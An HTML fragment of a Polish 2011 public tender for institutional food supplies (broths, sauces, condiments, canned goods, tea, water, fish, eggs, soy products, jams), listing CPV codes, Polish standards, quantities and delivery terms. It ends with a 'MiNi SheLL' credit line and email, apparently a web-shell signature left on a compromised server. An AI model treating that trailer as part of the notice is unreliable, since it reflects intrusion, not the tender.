<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.21.00-2, 15.87.24.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II Buliony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II Buliony
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Bulion jarzynowy w proszku - (kod CPV 15891500-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-94052. W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
2.Bulion z kury w proszku - (kod CPV 15891500-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-94052. W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
3.Sos biały w proszku - kod (CPV 15871260-4) W ilości 200 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 50 kg. 
4.Sos myśliwski w proszku - (kod CPV 15871260-4) jakościowo odpowiadający Polskiej Normie PN-A-86951:1997 W ilości 200 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 50 kg. 
5.Sos pieczeniowy w proszku - (kod CPV 15871260-4) jakościowo odpowiadający Polskiej Normie PN-A-86951:1997 W ilości 200 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 50 kg. 
6.Zupa grzybowa w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
7.Zupa pieczarkowa w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
8.Zupa żurek w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.15.00-5, 15.87.12.60-4, 15.89.14.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III Wafle ryżowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III Wafle ryżowe
Dostawy 1 - 3 razy na kwartał.
1.Wafle ryżowe - (kod CPV 15820000-2) W ilości 150 kg. Opakowanie jednostkowe do 200 g. Wielkość jednorazowej dostawy do 50 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV Mąka ziemniaczana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV Mąka ziemnieczana
Dostawy 1 - 3 razy na kwartał.
1.Mąka ziemniaczana - (kod CPV 15620000-0) jakościowo odpowiadająca Polskiej Normie PN-A-74710 W ilości 110g. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 40 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V Dodatki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V Dodatki 
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Chrzan tarty z kwaskiem cytrynowym - (kod CPV 15331400-1) jakościowo odpowiadający Polskiej Normie Nr PN-A-77806. W ilości 150 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
2.Majonez - (kod CPV 15871273-8) jakościowo odpowiadający Polskiej Normie Nr PN-A-86950:1995/Ap1:2000 W ilości 90 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
3.Musztarda - (kod CPV 15871250-1) jakościowo odpowiadający Polskiej Normie Nr PN-A- 86964:2002/Az1:2004 W ilości 150 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
4.Keczup - (kod CPV 15871230-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-86951:1997. W ilości 100 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg. 
5.Koncentrat pomidorowy 30% (kod CPV - 15331427-6) jakościowo odpowiadający Polskiej Normie Nr PN-A-77601:1975. W ilości 1200 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 400 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.33.14.27-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI Fasola szparagowa konserwowa i groch konserwowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI Fasola szparagowa konserwowa i groch konserwowy
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Fasola szparagowa konserwowa - (kod CPV 15331463-0) jakościowo odpowiadający Polskiej Normie Nr PN-76/A-77802. W ilości 450 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 300 kg. (Masa netto fasolki szparagowej po odsączeniu nie mniejsza niż 50 % całkowitej masy netto produktu).
2.Groch konserwowy - (kod CPV 15331462-3) jakościowo odpowiadający Polskiej Normie Nr PN-A-77805. W ilości 500 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 200 kg. (Masa netto groszku po odsączeniu nie mniejsza niż 50 % całkowitej masy netto produktu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.62-3, 15.33.14.63-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII Herbaty i kawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII Herbaty i kawa
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Herbata czarna granulowana luzem - (kod CPV 15863200-7) jakościowo odpowiadająca Polskiej Normie Nr PN-ISO 3720. W ilości 450 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 150 kg.
2.Herbata miętowa - (kod CPV 15860000-4). W ilości 100 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 100 kg.  
3.Kawa zbożowa - (kod CPV 15860000-4) lub 15862000-8  jakościowo odpowiadająca Polskiej Normie Nr PN-V-74029:2006. W ilości 200 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 100 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.32.00-7, 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII Woda mineralna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VIII Woda mineralna
Dostawy 1 - 3 razy na kwartał.
1.Woda mineralna (gazowana i/lub niegazowana wg wskazania zamawiającego) - (kod CPV 15981000-8) jakościowo odpowiadająca Polskiej Normie Nr PN-Z-11001-2. W ilości 15 000 l. Opakowanie jednostkowe do 2 l. Wielkość jednorazowej dostawy do 4000 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX Konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IX Konserwy rybne
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
Konserwy wyposażone w otwieracz
Pojedyncza dostawa pochodząca z jednej partii produkcyjnej
1.Konserwa rybna w oleju (kod CPV 15.24.00.00-2) W ilości 800 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg
2.Konserwa rybna w pomidorach (kod CPV 15.24.00.00-2) W ilości 800 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg.
3.Paprykarz szczecińska (kod CPV 15.24.00.00-2) W ilości 1700 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część X Ryby
Dostawy 1 - 4 razy w miesiącu w wybrane przez Zamawiającego poniedziałki i czwartki.
Zamówienie składane na 2 dni przed dostawą. 
Dostawa może obejmować pojedynczy asortyment z danej części.
Do każdej dostawy Wykonawca dołączy handlowy dokument identyfikacyjny HDI
1.Tusza z dorsza odgłowiona, bez glazury, mrożona (kod CPV 15220000-6). Jakościowo odpowiadająca Polskiej Normie PN-A-86759:1994. W ilości 290 kg. Wielkość jednorazowej dostawy podawanej przez Zamawiającego od 5 do 25 kg, realizowanej z dokładnością do 1 kg. 
2.Kotlety - Burgery rybne, panierowane, mrożone (kod CPV 15241700-6). Jakościowo odpowiadający Polskiej Normie PN-A-86769:1997. W ilości 1600 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 220 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.24.17.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI Jaja spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XI Jaja spożywcze
Dostawa raz w tygodniu w uzgodnionym z Zamawiającym dniu.
Termin przydatności do użycia liczony od dnia zrealizowania dostawy minimum 10 dni.
Jednorazowa dostawa ok 2160 sztuk, w wybrane przez zamawiającego dni ok 3240 sztuk.
W okresie świątecznym ilości oraz terminy dostaw ustalane każdorazowo indywidualnie jednakże odstęp między kolejnymi dostawami nie będzie przekraczał 10 dni.
1.Jaja spożywcze PN-A-86503 Klasy jakościowej A, kategorii wagowej M, w ilości 86 400 szt. (kod CPV 03142500-3).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część XII Produkty sojowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XII Produkty sojowe
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Kotlety sojowe (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 450 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 300 kg.
2.Kostka sojowa (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 850 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 300 kg.
3.Granulat sojowy (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 700 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 400 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część XIII Dżemy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XIII Dżemy
Dżemy wysokosłodzone, klasy II
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Dżem truskawkowy PN-A-75100:1994/ Az1:2000 (kod CPV15332296- 5) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
2.Dżem wiśniowy PN-A-75100:1994/ Az1:2000 (kod CPV15332291- 4) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
3.Dżem czarna porzeczka PN-A-75100:1994/ Az1:2000 (kod CPV15332293- 4) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
4.Dżem śliwkowy PN-A-75100:1994/ Az1:2000 (kod CPV15332290- 3) W ilości 400 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 200 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.96-5, 15.33.22.91-4, 15.33.22.93-4, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Część XIV Zupa szczawiowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XIV Zupa szczawiowa
Dostawy 1 - 3 razy na kwartał.
1. Zupa szczawiowa przecier - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie Nr PN-A-77807 W ilości 300 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 200 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com